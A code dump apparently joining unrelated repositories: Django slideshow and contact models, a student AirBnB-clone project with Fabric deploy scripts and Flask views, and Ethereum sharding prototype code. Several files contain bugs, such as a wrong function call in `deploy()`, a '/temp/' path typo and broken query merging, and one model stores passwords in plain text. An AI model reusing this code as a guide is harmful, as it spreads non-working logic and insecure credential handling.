('content', models.CharField(max_length=200, verbose_name='Enter content only upto 200 characters')),
('read_more', models.CharField(max_length=1000, verbose_name='Add a read more link to related article')),
],
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 14:07
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0003_auto_20210330_1351'),
]
operations = [
migrations.AlterField(
model_name='slideshowitem',
name='image',
field=models.ImageField(storage=django.core.files.storage.FileSystemStorage(location=('/Users/nikhilmankani/Downloads/Rescue/main_app/static',)), upload_to='Images/slideshow'),
),
]
--- FILE SEPARATOR ---
# Generated by Django 3.0.6 on 2021-03-30 14:08
import django.core.files.storage
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main_app', '0004_auto_20210330_1407'),
]
operations = [
migrations.AlterField(
model_name='slideshowitem',
name='image',
field=models.ImageField(storage=django.core.files.storage.FileSystemStorage(location='/Users/nikhilmankani/Downloads/Rescue/main_app/static'), upload_to='Images/slideshow'),
),
]
--- FILE SEPARATOR ---
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from django.core.files.storage import FileSystemStorage
# Pointer to the Filesystem where we store our static files
fs = FileSystemStorage(location=settings.STATICFILES_DIRS[0])
# Create your models here.
class contact(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE,related_name="contact", null=True)
name = models.CharField(max_length=100)
email = models.EmailField()
mobile_no = models.CharField(max_length=15)
Father = 'Father'
Mother = 'Mother'
Brother = 'Brother'
Sister = 'Sister'
Husband = 'Husband'
Friend = 'Friend'
Relative = 'Relative'
Other = 'Other'
relations = (
(Father, 'Father'),
(Mother, 'Mother'),
(Brother, 'Brother'),
(Sister, 'Sister'),
(Husband, 'Husband'),
(Friend, 'Friend'),
(Relative, 'Relative'),
(Other, 'Other'),
)
relation = models.CharField(max_length=10, choices=relations, default=Other)
def __str__(self):
return self.name
class Login(models.Model):
Username_or_Email= models.CharField(max_length=100)
password = models.CharField(max_length=32)
# Model to create the items for slideshow
class SlideShowItem(models.Model):
name = models.CharField(verbose_name="Name",max_length=30)
image = models.ImageField(upload_to="Images/slideshow",storage=fs)
content = models.CharField(verbose_name="Enter content only upto 200 characters",max_length=200)
read_more = models.CharField(verbose_name="Add a read more link to related article",max_length=1000)
def __str__(self):
return self.name
|
[
"/main_app/admin.py",
"/main_app/migrations/0002_login_slideshowitem.py",
"/main_app/migrations/0004_auto_20210330_1407.py",
"/main_app/migrations/0005_auto_20210330_1408.py",
"/main_app/models.py"
] |
01Eddie/AirBnB_clone_v2
|
#!/usr/bin/python3
"""Fabric script that generates a .tgz archive from the contents of the
web_static"""
import fabric
from fabric.api import local
from datetime import datetime
def do_pack():
""" Prototype: def do_pack():
* All files in the folder web_static must be added to the final archive
* All archives must be stored in the folder versions (your function should
create this folder if it doesn’t exist)
* The name of the archive created must be
web_static_<year><month><day><hour><minute><second>.tgz
* The function do_pack must return the archive path if the archive has
been correctly generated. Otherwise, it should return None """
try:
now = datetime.now()
NameArchive = "web_static_" + now.strftime("%Y%m%d%H%M%S")+ ".tgz"
PathArchive = "versions/" + NameArchive
local("sudo mkdir -p versions")
local("sudo tar -czvf {} web_static".format(PathArchive))
return PathArchive
except Exception:
return None
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""Fabric script (based on the file 1-pack_web_static.py) that distributes an
archive to your web servers"""
import fabric
from fabric.api import *
from datetime import datetime
from os import path
env.hosts = ['35.237.172.160', '35.237.222.103']
env.user = 'ubuntu'
def do_deploy(archive_path):
""" * Prototype: def do_deploy(archive_path):
- depending of your implementation of it, you may don’t need it """
if not path.exists(archive_path):
return False
try:
NameArchive = archive_path.split('/')[-1]
NameArchiveWitoutExtension = NameArchive.replace('.tgz', '')
put(archive_path, "/tmp/")
run("sudo mkdir -p /data/web_static/releases/" + NameArchiveWitoutExtension)
run("sudo tar -xzvf /tmp/" + NameArchive + " -C /data/web_static/releases/")
run("sudo rm -rf /tmp/" + NameArchive)
run("sudo mv /data/web_static/releases/" + NameArchiveWitoutExtension + "/web_static/* /data/web_static/releases/" + NameArchiveWitoutExtension + "/")
run("sudo rm -rf /data/web_static/releases/web_static")
run("sudo rm -rf /data/web_static/current")
run("sudo ln -sf /data/web_static/releases/ /data/web_static/current")
return True
except Exception:
return False
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""Fabric script (based on the file 2-do_deploy_web_static.py) that creates and
distributes an archive to your web servers:"""
import fabric
from fabric.api import local, env, put, run
from datetime import datetime
from os import path
env.hosts = ['35.237.172.160', '35.237.222.103']
def deploy():
"""* Prototype: def deploy():
* The script should take the following steps:
** Call the do_pack() function and store the path of the created archive
** Return False if no archive has been created
** Call the do_deploy(archive_path) function, using the new path of the new
archive
** Return the return value of do_deploy
* All remote commands must be executed on both of web your servers
(using env.hosts = ['<IP web-01>', 'IP web-02'] variable in your script)
* You must use this script to deploy it on your servers:
xx-web-01 and xx-web-02
In the following example, the SSH key and the username used for accessing to
the server are passed in the command line. Of course, you could define them as
Fabric environment variables (ex: env.user =…)
"""
archive = do_deploy()
if archive is None:
return False
result = do_deploy(archive)
return result
def do_deploy(archive_path):
""" * Prototype: def do_deploy(archive_path):
* Returns False if the file at the path archive_path doesn’t exist
* The script should take the following steps:
** Upload the archive to the /tmp/ directory of the web server
** Uncompress the archive to the folder
/data/web_static/releases/<archive filename without extension> on the web
server
** Delete the archive from the web server
** Delete the symbolic link /data/web_static/current from the web server
** Create a new the symbolic link /data/web_static/current on the web
server, linked to the new version of your code
(/data/web_static/releases/<archive filename without extension>)
* All remote commands must be executed on your both web servers
(using env.hosts = ['<IP web-01>', 'IP web-02'] variable in your script)
* Returns True if all operations have been done correctly,
otherwise returns False
* You must use this script to deploy it on your
servers: xx-web-01 and xx-web-02
In the following example, the SSH key and the username used for accessing
to the server are passed in the command line. Of course, you could define
them as Fabric environment variables (ex: env.user =...)
Disclaimer: commands execute by Fabric displayed below are linked to the
way we implemented the archive
function do_pack
- like the mv command
- depending of your implementation of it, you may don’t need it """
if not path.exists(archive_path):
return False
try:
NameArchive = archive_path[9:]
NameArchiveWitoutExtension = NameArchive[:-4]
put(archive_path, "/temp/" + NameArchive)
run("mkdir -p /data/web_static/releases/" + NameArchiveWitoutExtension)
run("tar -xzvf /tmp/" + NameArchive + " -C /data/web_static/releases/"
+ NameArchiveWitoutExtension + " --strip-components=1")
run("rm -rf /tmp/" + NameArchive)
run("rm -rf /data/web_static/current")
run("sudo ln -sf /data/web_static/releases/"
+ NameArchiveWitoutExtension + "/data/web_static/current")
return True
except Exception:
return False
def do_pack():
""" Prototype: def do_pack():
* All files in the folder web_static must be added to the final archive
* All archives must be stored in the folder versions (your function should
create this folder if it doesn’t exist)
* The name of the archive created must be
web_static_<year><month><day><hour><minute><second>.tgz
* The function do_pack must return the archive path if the archive has
been correctly generated. Otherwise, it should return None """
try:
now = datetime.now()
NameArchive = "web_static_" + now.strftime("%Y%m%d%H%M%S")+".tgz"
PathArchive = "versions/" + NameArchive
local("sudo mkdir -p versions")
local("sudo tar -cvzf {} web_static". format(PathArchive))
return PathArchive
except Exception:
return None
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""This module instantiates an object of class FileStorage"""
import models
from models.amenity import Amenity
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.place import Place
from models.review import Review
from os import getenv
""" Add a conditional depending of the value of the environment variable
HBNB_TYPE_STORAGE:
If equal to db:
Import DBStorage class in this file
Create an instance of DBStorage and store it in the variable storage (the line
storage.reload() should be executed after this instantiation)
Else:
Import FileStorage class in this file
Create an instance of FileStorage and store it in the variable storage (the
line storage.reload() should be executed after this instantiation) """
if getenv('HBNB_TYPE_STORAGE') == 'db':
from models.engine.db_storage import DBStorage
storage = DBStorage()
else:
from models.engine.file_storage import FileStorage
storage = FileStorage()
storage.reload()
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""DB_storage engine"""
import unittest
from os import getenv
from models.base_model import Base
from models.user import User
from models.state import State
from models.city import City
from models.place import Place
from models.review import Review
from models.amenity import Amenity
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import create_engine
class DBStorage:
'''DBStorage class : '''
__engine = None
__session = None
def __init__(self):
'''Create a new instance '''
self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'
.format(getenv('HBNB_MYSQL_USER'),
getenv('HBNB_MYSQL_PWD'),
getenv('HBNB_MYSQL_HOST'),
getenv('HBNB_MYSQL_DB')),
pool_pre_ping=True)
if getenv('HBNB_ENV') == 'test':
Base.metadata.drop_all(self.__engine)
def all(self, cls=None):
"""query on database session"""
if not cls:
res_list = self.__session.query(Amenity)
res_list.extend(self.__session.query(City))
res_list.extend(self.__session.query(Place))
res_list.extend(self.__session.query(Review))
res_list.extend(self.__session.query(State))
res_list.extend(self.__session.query(User))
else:
res_list = self.__session.query(cls)
return {'{}.{}'.format(type(obj).__name__, obj.id): obj
for obj in res_list}
def new(self, obj):
""" add object to the current database session """
self.__session.add(obj)
def save(self):
""" Commit all changes of the current db session """
self.__session.commit()
def delete(self, obj=None):
""" delete from the current db session """
if obj:
self.__session.delete(obj)
def reload(self):
""" create tables in db and create db session """
Base.metadata.create_all(self.__engine)
session_factory = sessionmaker(bind=self.__engine,
expire_on_commit=False)
self.__session = scoped_session(session_factory)
def close(self):
""" call remove() method on the private session attribute """
return self.__session.remove()
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" State Module for HBNB project """
from models.base_model import BaseModel, Base
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import relationship
from models.city import City
import models
from os import getenv
class State(BaseModel, Base):
""" State class """
if getenv('HBNB_TYPE_STORAGE') == 'db':
__tablename__ = 'states'
name = Column(String(128), nullable=False)
cities = relationship('City', cascade='delete', backref='state')
else:
name = ""
""" If your storage engine is not DBStorage, add a public getter method cities to return the list of City objects from storage linked to the current State """
if getenv('HBNB_TYPE_STORAGE') != 'db':
@property
def cities(self):
cities_list = []
all_cities = models.storage.all(City).values()
for ct in all_cities:
if ct.state_id == self.id:
cities_list.append(ct)
return cities_list
--- FILE SEPARATOR ---
#!/usr/bin/ỳthon3
"""test for the console"""
import unittest
from console import HBNBCommand
from models.base_model import BaseModel
from models.__init__ import storage
from models.user import User
from models.place import Place
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.review import Review
class TestConsole(unittest.TestCase):
def test_prompt(self):
""" Test for the name in the prompt"""
self.assertEqual('(hbnb) ', HBNBCommand.prompt)
--- FILE SEPARATOR ---
#!/usr/bin/python3
"""test for db storage"""
import unittest
from unittest.mock import patch
from io import StringIO
import pep8
import os
import json
import console
import tests
from console import HBNBCommand
from models.base_model import BaseModel
from models.user import User
from models.state import State
from models.city import City
from models.amenity import Amenity
from models.place import Place
from models.review import Review
from models.engine.file_storage import FileStorage
from models.engine.db_storage import DBStorage
class TestDbStorage(unittest.TestCase):
"""this will test the db_storage"""
def test_docstrings_in_db(self):
"""checking for docstrings"""
self.assertIsNotNone(DBStorage.__doc__)
self.assertIsNotNone(DBStorage. __init__.__doc__)
self.assertIsNotNone(DBStorage.all.__doc__)
self.assertIsNotNone(DBStorage.new.__doc__)
self.assertIsNotNone(DBStorage.save.__doc__)
self.assertIsNotNone(DBStorage.delete.__doc__)
self.assertIsNotNone(DBStorage.reload.__doc__)
if __name__ == "__main__":
unittest.main()
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.route("/hbnb_filters", strict_slashes=False)
def states():
""" Routes:
/hbnb_filters: display a HTML page like 6-index.html, which was done during the project 0x01. AirBnB clone - Web static
Copy files 3-footer.css, 3-header.css, 4-common.css and 6-filters.css from web_static/styles/ to the folder web_flask/static/styles
Copy files icon.png and logo.png from web_static/images/ to the folder web_flask/static/images
Update .popover class in 6-filters.css to allow scrolling in the popover and a max height of 300 pixels.
Use 6-index.html content as source code for the template 10-hbnb_filters.html:
Replace the content of the H4 tag under each filter title (H3 States and H3 Amenities) by
State, City and Amenity objects must be loaded from DBStorage and sorted by name (A->Z) """
stateAll = storage.all("State").values()
amenityAll = storage.all("Amenity").values()
return render_template("10-hbnb_filters.html", stateAll=stateAll,amenityAll=amenityAll)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(self):
""" After each request you must remove the current SQLAlchemy Session:
Declare a method to handle @app.teardown_appcontext
Call in this method storage.close() """
storage.close()
@app.route("/states_list", strict_slashes=False)
def stateslist(request):
""" Routes:
/states_list: display a HTML page: (inside the tag BODY)
H1 tag: “States”
UL tag: with the list of all State objects present in DBStorage sorted by name (A->Z) tip
LI tag: description of one State: <state.id>: <B><state.name></B> """
liststates = storage.all("State").values()
return render_template('7-states_list.html', liststates=liststates)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(self):
""" After each request you must remove the current SQLAlchemy Session:
Declare a method to handle @app.teardown_appcontext
Call in this method storage.close() """
storage.close()
@app.route("/cities_by_states", strict_slashes=False)
def citiesbystates(request):
""" Routes:
/cities_by_states: display a HTML page: (inside the tag BODY)
H1 tag: “States”
UL tag: with the list of all State objects present in DBStorage sorted by name (A->Z) tip
LI tag: description of one State: <state.id>: <B><state.name></B> + UL tag: with the list of City objects linked to the State sorted by name (A->Z)
LI tag: description of one City: <city.id>: <B><city.name></B> """
citystate = storage.all("State").values()
return render_template('8-cities_by_states.html', citystate=citystate)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
--- FILE SEPARATOR ---
#!/usr/bin/python3
""" script that starts a Flask web application """
from flask import Flask, render_template
from models import storage
from models.state import State
app = Flask(__name__)
@app.teardown_appcontext
def closeStorage(self):
""" After each request you must remove the current SQLAlchemy Session:
Declare a method to handle @app.teardown_appcontext
Call in this method storage.close() """
storage.close()
@app.route("/states", strict_slashes=False)
@app.route("/states/<id>", strict_slashes=False)
def states(stateId=None):
""" Routes:
/states/<id>: display a HTML page: (inside the tag BODY)
If a State object is found with this id:
H1 tag: “State: ”
H3 tag: “Cities:”
UL tag: with the list of City objects linked to the State sorted by name (A->Z)
LI tag: description of one City: <city.id>: <B><city.name></B>
Otherwise:
H1 tag: "Not found!" """
states = storage.all("State")
state = stateId
if state is not None:
state = "State." + state
else:
return render_template('9-states.html', states=states, stateId=stateId)
@app.teardown_appcontext
def closeStorage(self):
""" After each request you must remove the current SQLAlchemy Session:
Declare a method to handle @app.teardown_appcontext
Call in this method storage.close() """
storage.close()
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000)
|
[
"/1-pack_web_static.py",
"/2-do_deploy_web_static01.py",
"/3-deploy_web_static.py",
"/models/__init__.py",
"/models/engine/db_storage.py",
"/models/state.py",
"/tests/test_console.py",
"/tests/test_models/test_engine/test_db_storage.py",
"/web_flask/10-hbnb_filters.py",
"/web_flask/7-states_list.py",
"/web_flask/8-cities_by_states.py",
"/web_flask/9-states.py"
] |
01admin/sharding
|
from ethereum.slogging import get_logger
from ethereum.consensus_strategy import get_consensus_strategy
from ethereum.messages import apply_transaction
from ethereum import utils
from sharding import state_transition
log = get_logger('sharding.collator')
def apply_collation(state, collation, period_start_prevblock):
"""Apply collation
"""
snapshot = state.snapshot()
cs = get_consensus_strategy(state.config)
try:
# Call the initialize state transition function
cs.initialize(state, period_start_prevblock)
# assert cs.check_seal(state, period_start_prevblock.header)
# Validate tx_list_root in collation first
assert state_transition.validate_transaction_tree(collation)
for tx in collation.transactions:
apply_transaction(state, tx)
# Set state root, receipt root, etc
state_transition.finalize(state, collation.header.coinbase)
assert state_transition.verify_execution_results(state, collation)
except (ValueError, AssertionError) as e:
state.revert(snapshot)
raise e
return state
def create_collation(
chain,
shardId,
parent_collation_hash,
expected_period_number,
coinbase,
key,
txqueue=None):
"""Create a collation
chain: MainChain
shardId: id of ShardChain
parent_collation_hash: the hash of the parent collation
expected_period_number: the period number in which this collation expects to be included
coinbase: coinbase
key: key for sig
txqueue: transaction queue
"""
log.info('Creating a collation')
assert chain.has_shard(shardId)
temp_state = chain.shards[shardId].mk_poststate_of_collation_hash(parent_collation_hash)
cs = get_consensus_strategy(temp_state.config)
# Set period_start_prevblock info
period_start_prevhash = chain.get_period_start_prevhash(expected_period_number)
assert period_start_prevhash is not None
period_start_prevblock = chain.get_block(period_start_prevhash)
# Call the initialize state transition function
cs.initialize(temp_state, period_start_prevblock)
# Initialize a collation with the given previous state and current coinbase
collation = state_transition.mk_collation_from_prevstate(chain.shards[shardId], temp_state, coinbase)
# Add transactions
state_transition.add_transactions(temp_state, collation, txqueue)
# Call the finalize state transition function
state_transition.finalize(temp_state, collation.header.coinbase)
# Set state root, receipt root, etc
state_transition.set_execution_results(temp_state, collation)
collation.header.shardId = shardId
collation.header.parent_collation_hash = parent_collation_hash
collation.header.expected_period_number = expected_period_number
collation.header.period_start_prevhash = period_start_prevhash
try:
sig = sign(collation.signing_hash, key)
collation.header.sig = sig
except Exception as e:
log.info('Failed to sign collation, exception: {}'.format(str(e)))
log.info('Created collation successfully')
return collation
def sign(msg_hash, privkey):
"""Use privkey to ecdsa-sign the msg_hash
"""
v, r, s = utils.ecsign(msg_hash, privkey)
signature = utils.encode_int32(v) + utils.encode_int32(r) + utils.encode_int32(s)
return signature
--- FILE SEPARATOR ---
import copy
from ethereum.config import default_config
from ethereum import utils
sharding_config = copy.deepcopy(default_config)
# sharding_config['HOMESTEAD_FORK_BLKNUM'] = 0
# sharding_config['METROPOLIS_FORK_BLKNUM'] = 0
# sharding_config['SERENITY_FORK_BLKNUM'] = 0
# sharding_config['MAX_SHARD_DEPTH'] = 4
# sharding_config['SHARD_CHILD_COUNT'] = 3
# sharding_config['SIGNATURE_COUNT'] = 12
# sharding_config['VALIDATOR_MANAGER_ADDRESS'] = '' # TODO
# sharding_config['SIG_GASLIMIT'] = 200000
# sharding_config['ROOT_SHARD_SIGNER_REWARD'] = 0.002
# sharding_config['SHARD_REWARD_DECAY_FACTOR'] = 3
# sharding_config['SHUFFLING_CYCLE'] = 2500
sharding_config['HOMESTEAD_FORK_BLKNUM'] = 0
sharding_config['METROPOLIS_FORK_BLKNUM'] = 0
sharding_config['SERENITY_FORK_BLKNUM'] = 0
sharding_config['SHARD_COUNT'] = 100
# valmgr_addr: should be modified whenever "the v, r, s in valmgr tx" or
# "the content of the contract" change
# TODO: Should we just call the sharding.validator_manager.get_valmgr_addr()
# to determine the valmgr address here for now? Or add a check in
# test_validator_manager.py to check if
# `sharding_config['VALIDATOR_MANAGER_ADDRESS']` equals to
# `utils.checksum_encode(get_valmgr_addr())`?
# Because currently we modify the contract so frequently.
sharding_config['VALIDATOR_MANAGER_ADDRESS'] = '0x8dcD67edcEbb9C169bDb16F7c9fAc19E34d633D0'
sharding_config['USED_RECEIPT_STORE_ADDRESS'] = '' # TODO
sharding_config['SIG_GASLIMIT'] = 40000
sharding_config['COLLATOR_REWARD'] = 0.002 * utils.denoms.ether
sharding_config['SIG_GASLIMIT'] = 40000
sharding_config['PERIOD_LENGTH'] = 5 # blocks
sharding_config['SHUFFLING_CYCLE'] = 2500 # blocks
--- FILE SEPARATOR ---
from builtins import (bytes, str, open, super, range,
zip, round, input, int, pow, object)
import itertools
import rlp
from rlp.utils import encode_hex
from ethereum import utils
from ethereum.meta import apply_block
from ethereum.exceptions import InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger
from ethereum.pow.chain import Chain
from sharding.shard_chain import ShardChain
log = get_logger('eth.chain')
def safe_decode(x):
if x[:2] == '0x':
x = x[2:]
return utils.decode_hex(x)
class MainChain(Chain):
"""Slightly modified pow.chain for sharding
"""
def __init__(self, genesis=None, env=None,
new_head_cb=None, reset_genesis=False, localtime=None, **kwargs):
super().__init__(
genesis=genesis, env=env,
new_head_cb=new_head_cb, reset_genesis=reset_genesis, localtime=localtime, **kwargs)
self.shards = {}
self.shard_id_list = set()
def init_shard(self, shardId):
"""Initialize a new ShardChain and add it to MainChain
"""
if not self.has_shard(shardId):
self.shard_id_list.add(shardId)
self.shards[shardId] = ShardChain(env=self.env, shardId=shardId)
return True
else:
return False
def add_shard(self, shard):
"""Add an existing ShardChain to MainChain
"""
if not self.has_shard(shard.shardId):
self.shards[shard.shardId] = shard
self.shard_id_list.add(shard.shardId)
return True
else:
return False
def has_shard(self, shardId):
"""Check if the validator is tracking of this shard
"""
return shardId in self.shard_id_list
# Call upon receiving a block, reorganize the collation head
# TODO: Override add_block
def add_block(self, block):
now = self.localtime
# Are we receiving the block too early?
if block.header.timestamp > now:
i = 0
while i < len(self.time_queue) and block.timestamp > self.time_queue[i].timestamp:
i += 1
self.time_queue.insert(i, block)
log.info('Block received too early (%d vs %d). Delaying for %d seconds' %
(now, block.header.timestamp, block.header.timestamp - now))
return False
# Is the block being added to the head?
if block.header.prevhash == self.head_hash:
log.info('Adding to head', head=encode_hex(block.header.prevhash))
try:
apply_block(self.state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %d (%s) with parent %s invalid, reason: %s' %
(block.number, encode_hex(block.header.hash), encode_hex(block.header.prevhash), e))
return False
self.db.put(b'block:%d' % block.header.number, block.header.hash)
block_score = self.get_score(block) # side effect: put 'score:' cache in db
self.head_hash = block.header.hash
for i, tx in enumerate(block.transactions):
self.db.put(b'txindex:' + tx.hash, rlp.encode([block.number, i]))
assert self.get_blockhash_by_number(block.header.number) == block.header.hash
# Or is the block being added to a chain that is not currently the head?
elif block.header.prevhash in self.env.db:
log.info('Receiving block not on head, adding to secondary post state',
prevhash=encode_hex(block.header.prevhash))
temp_state = self.mk_poststate_of_blockhash(block.header.prevhash)
try:
apply_block(temp_state, block)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
log.info('Block %s with parent %s invalid, reason: %s' %
(encode_hex(block.header.hash), encode_hex(block.header.prevhash), e))
return False
block_score = self.get_score(block)
# If the block should be the new head, replace the head
if block_score > self.get_score(self.head):
b = block
new_chain = {}
# Find common ancestor
while b.header.number >= int(self.db.get('GENESIS_NUMBER')):
new_chain[b.header.number] = b
key = b'block:%d' % b.header.number
orig_at_height = self.db.get(key) if key in self.db else None
if orig_at_height == b.header.hash:
break
if b.prevhash not in self.db or self.db.get(b.prevhash) == 'GENESIS':
break
b = self.get_parent(b)
# Replace block index and tx indices
replace_from = b.header.number
for i in itertools.count(replace_from):
log.info('Rewriting height %d' % i)
key = b'block:%d' % i
orig_at_height = self.db.get(key) if key in self.db else None
if orig_at_height:
self.db.delete(key)
orig_block_at_height = self.get_block(orig_at_height)
for tx in orig_block_at_height.transactions:
if b'txindex:' + tx.hash in self.db:
self.db.delete(b'txindex:' + tx.hash)
if i in new_chain:
new_block_at_height = new_chain[i]
self.db.put(key, new_block_at_height.header.hash)
for i, tx in enumerate(new_block_at_height.transactions):
self.db.put(b'txindex:' + tx.hash,
rlp.encode([new_block_at_height.number, i]))
if i not in new_chain and not orig_at_height:
break
self.head_hash = block.header.hash
self.state = temp_state
# Block has no parent yet
else:
if block.header.prevhash not in self.parent_queue:
self.parent_queue[block.header.prevhash] = []
self.parent_queue[block.header.prevhash].append(block)
log.info('No parent found. Delaying for now')
return False
self.add_child(block)
self.db.put('head_hash', self.head_hash)
self.db.put(block.header.hash, rlp.encode(block))
self.db.commit()
log.info(
'Added block %d (%s) with %d txs and %d gas' %
(block.header.number, encode_hex(block.header.hash)[:8], len(block.transactions), block.header.gas_used))
if self.new_head_cb and block.header.number != 0:
self.new_head_cb(block)
if block.header.hash in self.parent_queue:
for _blk in self.parent_queue[block.header.hash]:
self.add_block(_blk)
del self.parent_queue[block.header.hash]
return True
def get_expected_period_number(self):
"""Get default expected period number to be the period number of the next block
"""
return (self.state.block_number + 1) // self.env.config['PERIOD_LENGTH']
def get_period_start_prevhash(self, expected_period_number):
"""Get period_start_prevhash by expected_period_number
"""
block_number = self.env.config['PERIOD_LENGTH'] * expected_period_number - 1
period_start_prevhash = self.get_blockhash_by_number(block_number)
if period_start_prevhash is None:
log.info('No such block number %d' % block_number)
return period_start_prevhash
# TODO: test
def update_head_collation_of_block(self, collation):
"""Update ShardChain.head_collation_of_block
"""
shardId = collation.header.shardId
collhash = collation.header.hash
# Get the blockhash list of blocks that include the given collation
if collhash in self.shards[shardId].collation_blockhash_lists:
blockhash_list = self.shards[shardId].collation_blockhash_lists[collhash]
while blockhash_list:
blockhash = blockhash_list.pop(0)
given_collation_score = self.shards[shardId].get_score(collation)
head_collation_score = self.shards[shardId].get_score(self.shards[shardId].get_head_collation(blockhash))
if given_collation_score > head_collation_score:
self.shards[shardId].head_collation_of_block[blockhash] = collhash
block = self.get_block(blockhash)
blockhash_list.extend(self.get_children(block))
return True
# TODO: test
def reorganize_head_collation(self, block, collation):
"""Reorganize head collation
block: head block
collation: given collation
"""
blockhash = block.header.hash
collhash = collation.header.hash
shardId = collation.header.shardId
head_coll_in_prevhash = False
# Update collation_blockhash_lists
if self.has_shard(shardId) and self.shards[shardId].db.get(collhash) is not None:
self.shards[shardId].collation_blockhash_lists[collhash].append(blockhash)
else:
head_coll_in_prevhash = True
# Compare scores
given_collation_score = self.shards[shardId].get_score(collation)
head_collation_score = self.get_score(self.shards[shardId].head_collation_of_block[blockhash])
if given_collation_score > head_collation_score:
self.shards[shardId].head_collation_of_block[blockhash] = collhash
else:
head_coll_in_prevhash = True
if head_coll_in_prevhash:
self.shards[shardId].head_collation_of_block[blockhash] = self.shards[shardId].head_collation_of_block[block.header.prevhash]
self.shards[shardId].head_hash = self.shards[shardId].head_collation_of_block[blockhash]
def handle_orphan_collation(self, collation):
"""Handle the orphan collation (previously ignored collation)
collation: the parent collation
"""
if collation.header.hash in self.shards[collation.shardId].parent_queue:
for _collation in self.shards[collation.shardId].parent_queue[collation.header.hash]:
_period_start_prevblock = self.get_block(collation.header.period_start_prevhash)
self.shards[collation.shardId].add_collation(_collation, _period_start_prevblock, self.handle_orphan_collation)
del self.shards[collation.shardId].parent_queue[collation.header.hash]
self.update_head_collation_of_block(collation)
--- FILE SEPARATOR ---
import time
import json
import logging
from collections import defaultdict
import rlp
from rlp.utils import encode_hex
from ethereum import utils
from ethereum.exceptions import InvalidTransaction, VerificationFailed
from ethereum.slogging import get_logger
from ethereum.config import Env
from ethereum.state import State
from ethereum.pow.consensus import initialize
from sharding.collation import CollationHeader, Collation
from sharding.collator import apply_collation
from sharding.state_transition import update_collation_env_variables
log = get_logger('sharding.shard_chain')
log.setLevel(logging.DEBUG)
def safe_decode(x):
if x[:2] == '0x':
x = x[2:]
return utils.decode_hex(x)
def initialize_genesis_keys(state, genesis):
"""Rewrite ethereum.genesis_helpers.initialize_genesis_keys
"""
db = state.db
# db.put('GENESIS_NUMBER', str(genesis.header.number))
db.put('GENESIS_HASH', str(genesis.header.hash))
db.put('GENESIS_STATE', json.dumps(state.to_snapshot()))
db.put('GENESIS_RLP', rlp.encode(genesis))
db.put(b'score:' + genesis.header.hash, "0")
db.put(b'state:' + genesis.header.hash, state.trie.root_hash)
db.put(genesis.header.hash, 'GENESIS')
db.commit()
class ShardChain(object):
def __init__(self, shardId, env=None,
new_head_cb=None, reset_genesis=False, localtime=None,
initial_state=None, **kwargs):
self.env = env or Env()
self.shardId = shardId
self.collation_blockhash_lists = defaultdict(list) # M1: collation_header_hash -> list[block_hash]
self.head_collation_of_block = {} # M2: block_hash -> head_collation
# Initialize the state
head_hash_key = 'shard_' + str(shardId) + '_head_hash'
if head_hash_key in self.db: # new head tag
self.state = self.mk_poststate_of_collation_hash(self.db.get(head_hash_key))
log.info(
'Initializing shard chain from saved head, #%d (%s)' %
(self.state.prev_headers[0].number, encode_hex(self.state.prev_headers[0].hash)))
self.head_hash = self.state.prev_headers[0].hash
else:
# no head_hash in db -> empty shard chain
if initial_state is not None and isinstance(initial_state, State):
# Normally, initial_state is for testing
assert env is None
self.state = initial_state
self.env = self.state.env
log.info('Initializing chain from provided state')
else:
self.state = State(env=self.env)
self.head_hash = self.env.config['GENESIS_PREVHASH']
self.db.put(self.head_hash, 'GENESIS')
self.db.put(head_hash_key, self.head_hash)
# initial score
key = b'score:' + self.head_hash
self.db.put(key, str(0))
self.db.commit()
reset_genesis = True
assert self.env.db == self.state.db
initialize(self.state)
self.new_head_cb = new_head_cb
if reset_genesis:
initialize_genesis_keys(self.state, Collation(CollationHeader()))
self.time_queue = []
self.parent_queue = {}
self.localtime = time.time() if localtime is None else localtime
@property
def db(self):
return self.env.db
# TODO: use head_collation_of_block to update head collation
@property
def head(self):
"""head collation
"""
try:
collation_rlp = self.db.get(self.head_hash)
# [TODO] no genesis collation
if collation_rlp == 'GENESIS':
return Collation(CollationHeader())
# return self.genesis
else:
return rlp.decode(collation_rlp, Collation)
return rlp.decode(collation_rlp, Collation)
except Exception as e:
log.info(str(e))
print(str(e))
return None
def add_collation(self, collation, period_start_prevblock, handle_orphan_collation):
"""Add collation to db and update score
"""
if collation.header.parent_collation_hash in self.env.db:
log.info(
'Receiving collation(%s) which its parent is in db: %s' %
(encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash)))
if self.is_first_collation(collation):
log.debug('It is the first collation of shard {}'.format(self.shardId))
temp_state = self.state.ephemeral_clone()
else:
temp_state = self.mk_poststate_of_collation_hash(collation.header.parent_collation_hash)
try:
apply_collation(temp_state, collation, period_start_prevblock)
except (AssertionError, KeyError, ValueError, InvalidTransaction, VerificationFailed) as e:
